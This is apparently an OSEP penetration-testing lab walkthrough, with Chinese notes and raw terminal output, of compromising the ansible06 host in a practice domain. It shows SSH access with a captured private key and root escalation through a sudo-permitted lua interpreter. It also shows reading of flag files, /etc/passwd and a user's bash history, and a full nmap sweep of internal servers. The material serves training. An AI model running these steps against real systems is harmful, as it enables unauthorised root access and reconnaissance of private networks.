获取id_rsa之后,可以进行免密登录:
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ **proxychains4 ssh -i id_rsa final\\\\[email protected]** 130 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.184:22 ... OK
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
6 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Nov 2 15:29:24 2020 from 172.16.50.183
[email protected]@ansible06:~$
[email protected]@ansible06:~$ find / -name local.txt 2>/dev/null
/home/[email protected]/local.txt
[email protected]@ansible06:~$ cat /home/[email protected]/local.txt
320cadccfa931d8444d263fd38352908
提权参考:https://gtfobins.github.io/gtfobins/lua/
[email protected]@ansible06:~$ sudo -l
Matching Defaults entries for [email protected] on ansible06:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User [email protected] may run the following commands on ansible06:
(ALL) NOPASSWD: /usr/bin/lua
[email protected]@ansible06:~$ **sudo /usr/bin/lua -e 'os.execute("/bin/sh")'**
# id
uid=0(root) gid=0(root) groups=0(root)
# find / -name proof.txt 2>/dev/null
/root/proof.txt
# cat /root/proof.txt
475e008585daee29fbc9d0fc4a5f4491
# **~~python3 -m 'import pty;pty.spawn("/bin/bash")'~~**
/usr/bin/python3: Error while finding module specification for 'import pty;pty.spawn("/bin/bash")' (ModuleNotFoundError: No module named 'import pty;pty')
# python3
Python 3.8.5 (default, Jul 28 2020, 12:59:40)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
>>> pty.spawn("/bin/bash")
root@ansible06:/home/[email protected]#
# **python3 -c 'import pty; pty.spawn("/bin/bash")'**
root@ansible06:/home/[email protected]#
root@ansible06:/home/[email protected]# **cat /etc/passwd**
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
offsec:x:1000:1000:offsec,,,:/home/offsec:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
sssd:x:127:133:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ansiblesvc:x:1001:1001:,,,:/home/ansiblesvc:/bin/bash
root@ansible06:/home/[email protected]# **cd /home/ansiblesvc/**
root@ansible06:/home/ansiblesvc# ls -alh
total 84K
drwxr-xr-x 15 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .
drwxr-xr-x 5 root root 4.0K Oct 27 2020 ..
-rw------- 1 ansiblesvc ansiblesvc 523 Oct 27 2020 .bash_history
-rw-r--r-- 1 ansiblesvc ansiblesvc 220 Oct 27 2020 .bash_logout
-rw-r--r-- 1 ansiblesvc ansiblesvc 3.7K Oct 27 2020 .bashrc
drwxr-xr-x 10 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .cache
drwxr-xr-x 11 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .config
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Desktop
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Documents
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Downloads
drwx------ 3 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .gnupg
drwxr-xr-x 3 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .local
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Music
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Pictures
-rw-r--r-- 1 ansiblesvc ansiblesvc 807 Oct 27 2020 .profile
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Public
drwx------ 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 .ssh
-rw-r--r-- 1 ansiblesvc ansiblesvc 0 Oct 27 2020 .sudo_as_admin_successful
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Templates
drwxr-xr-x 2 ansiblesvc ansiblesvc 4.0K Oct 27 2020 Videos
-rw------- 1 ansiblesvc ansiblesvc 2.6K Oct 27 2020 y
-rw-r--r-- 1 ansiblesvc ansiblesvc 574 Oct 27 2020 y.pub
root@ansible06:/home/ansiblesvc# cat .bash_history
ssh-keygen
sudo nano /etc/ansible/hosts
**ssh-copy-id [email protected]**
**ping appserver05.dev.final.com**
ssh-copy-id [email protected]
[email protected]
ssh [email protected]
ssh-copy-id [email protected]
ssh-copy-id appserver05.dev.final.com
ls -la
ls ./.ssh/
ssh-keygen
ls ./.ssh/
ssh-copy-id [email protected]
ssh [email protected]
hostname
sudo realm permit -g 'LinuxUsers'
exit
id
sudo su
root@ansible06:/home/ansiblesvc# ping appserver05.dev.final.com
PING appserver05.dev.final.com (172.16.243.197) 56(84) bytes of data.
64 bytes from 172.16.243.197: icmp_seq=1 ttl=64 time=0.821 ms
64 bytes from 172.16.243.197: icmp_seq=2 ttl=64 time=0.253 ms
64 bytes from 172.16.243.197: icmp_seq=3 ttl=64 time=0.384 ms
64 bytes from 172.16.243.197: icmp_seq=4 ttl=64 time=0.382 ms
64 bytes from 172.16.243.197: icmp_seq=5 ttl=64 time=0.359 ms
64 bytes from 172.16.243.197: icmp_seq=6 ttl=64 time=0.326 ms
^C
--- appserver05.dev.final.com ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 14097ms
rtt min/avg/max/mdev = 0.253/0.420/0.821/0.184 ms
root@ansible06:/home/ansiblesvc# **cat /etc/ansible/hosts**
# This is the default ansible 'hosts' file.
#
# It should live in /etc/ansible/hosts
#
# - Comments begin with the '#' character
# - Blank lines are ignored
# - Groups of hosts are delimited by [header] elements
# - You can enter hostnames or ip addresses
# - A hostname/ip can be a member of multiple groups
# Ex 1: Ungrouped hosts, specify before any group headers.
#green.example.com
#blue.example.com
#192.168.100.1
#192.168.100.10
# Ex 2: A collection of hosts belonging to the 'webservers' group
[appservers]
**appserver05.dev.final.com**
#[webservers]
#alpha.example.org
#beta.example.org
#192.168.1.100
#192.168.1.110
# If you have multiple hosts following a pattern you can specify
# them like this:
#www[001:006].example.com
# Ex 3: A collection of database servers in the 'dbservers' group
#[dbservers]
#
#db01.intranet.mydomain.net
#db02.intranet.mydomain.net
#10.25.1.56
#10.25.1.57
# Here's another example of host ranges, this time there are no
# leading 0s:
#db-[99:101]-node.example.com
root@ansible06:/home/[email protected]# ping -c 1 sql03.final.com
PING **sql03.final.com (172.16.243.187)** 56(84) bytes of data.
64 bytes from 172.16.243.187: icmp_seq=1 ttl=128 time=0.239 ms
--- sql03.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
root@ansible06:/home/[email protected]# ping -c 1 sql11.final.com
PING **sql11.final.com (172.16.243.188)** 56(84) bytes of data.
64 bytes from 172.16.243.188: icmp_seq=1 ttl=128 time=0.330 ms
--- sql11.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.330/0.330/0.330/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 dc01.final.com
PING **dc01.final.com (172.16.243.180)** 56(84) bytes of data.
64 bytes from 172.16.243.180: icmp_seq=1 ttl=128 time=0.204 ms
--- dc01.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.204/0.204/0.204/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 web05.final.com
PING **web05.final.com (172.16.243.181)** 56(84) bytes of data.
64 bytes from 172.16.243.181: icmp_seq=1 ttl=128 time=0.261 ms
--- web05.final.com ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.261/0.261/0.261/0.000 ms
root@ansible06:/home/[email protected]# ping -c 1 jump03.final.com
PING **jump03.final.com (172.16.243.183)** 56(84) bytes of data.
--- jump03.final.com ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms
root@ansible06:/home/ansiblesvc# !22
**./run-nmap.sh -Pn -A -p- 172.16.243.180,183,184,187,188,192,194,197**
Starting Nmap 7.91SVN ( <https://nmap.org> ) at 2022-08-03 22:41 EDT
**Nmap scan report for 172.16.243.180**
Host is up (0.00039s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-04 02:45:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: DC01
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: dc01.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:17+00:00
| ssl-cert: Subject: commonName=dc01.final.com
| Not valid before: 2022-08-02T23:53:34
|_Not valid after: 2023-02-01T23:53:34
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:3A:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:86:3a:ad (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-04T02:46:18
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 172.16.243.180
**Nmap scan report for 172.16.243.183**
Host is up (0.00015s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: JUMP03
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: jump03.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:18+00:00
| ssl-cert: Subject: commonName=jump03.final.com
| Not valid before: 2022-08-02T23:54:10
|_Not valid after: 2023-02-01T23:54:10
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:02:35 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms 172.16.243.183
**Nmap scan report for 172.16.243.187**
Host is up (0.00025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-03T23:54:51
|_Not valid after: 2052-08-03T23:54:51
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:19+00:00
| ssl-cert: Subject: commonName=sql03.final.com
| Not valid before: 2022-08-02T23:53:45
|_Not valid after: 2023-02-01T23:53:45
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:A0:8F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.243.187:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:46:21
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 172.16.243.187
**Nmap scan report for 172.16.243.188**
Host is up (0.00039s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-03T23:54:31
|_Not valid after: 2052-08-03T23:54:31
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:46:17+00:00
| ssl-cert: Subject: commonName=sql11.final.com
| Not valid before: 2022-08-02T23:53:48
|_Not valid after: 2023-02-01T23:53:48
|_ssl-date: 2022-08-04T02:46:58+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:6C:34 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.243.188:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:46:18
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 172.16.243.188
**Nmap scan report for 172.16.243.192**
Host is up (0.00037s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-04 02:49:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: final.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DEV
| NetBIOS_Domain_Name: DEV
| NetBIOS_Computer_Name: DC02
**| DNS_Domain_Name: dev.final.com
| DNS_Computer_Name: dc02.dev.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:49:55+00:00
| ssl-cert: Subject: commonName=dc02.dev.final.com
| Not valid before: 2022-08-02T23:54:42
|_Not valid after: 2023-02-01T23:54:42
|_ssl-date: 2022-08-04T02:50:35+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
62215/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:86:E7:1B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC02, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:86:e7:1b (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-08-04T02:49:55
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 172.16.243.192
**Nmap scan report for 172.16.243.194**
Host is up (0.00037s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final Web Store
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: DEV
| NetBIOS_Domain_Name: DEV
| NetBIOS_Computer_Name: WEB06
**| DNS_Domain_Name: dev.final.com
| DNS_Computer_Name: web06.dev.final.com
| DNS_Tree_Name: final.com**
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-04T02:49:56+00:00
| ssl-cert: Subject: commonName=web06.dev.final.com
| Not valid before: 2022-06-19T00:23:29
|_Not valid after: 2022-12-19T00:23:29
|_ssl-date: 2022-08-04T02:50:35+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
**8080/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)**
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final CMS App
MAC Address: 00:50:56:86:5C:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-04T02:49:56
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 172.16.243.194
**Nmap scan report for 172.16.243.197**
Host is up (0.00036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 18:e4:25:fa:33:7b:b3:32:d7:96:3e:02:d7:6a:33:e2 (RSA)
| 256 8a:1f:a8:d1:6e:e2:d8:97:bc:81:11:99:00:0a:aa:77 (ECDSA)
|_ 256 5d:80:95:81:b6:03:09:f9:e1:5b:b3:1f:40:1c:1f:55 (ED25519)
MAC Address: 00:50:56:86:45:B3 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 172.16.243.197
**Nmap scan report for ansible06 (172.16.243.184)**
Host is up (0.000025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:88:62:f2:ab:c8:53:7b:41:44:13:11:98:05:e8:75 (RSA)
| 256 07:e2:ae:5f:0d:c0:21:97:d3:a1:67:0d:8a:2f:23:48 (ECDSA)
|_ 256 7f:bb:09:36:bd:21:68:d8:f6:4b:65:b9:9b:56:a6:1e (ED25519)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Post-scan script results:
| clock-skew:
| 0s:
| 172.16.243.187
| 172.16.243.188
| 172.16.243.183
| 172.16.243.180
| 172.16.243.194
|_ 172.16.243.192
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 8 IP addresses (8 hosts up) scanned in 536.10 seconds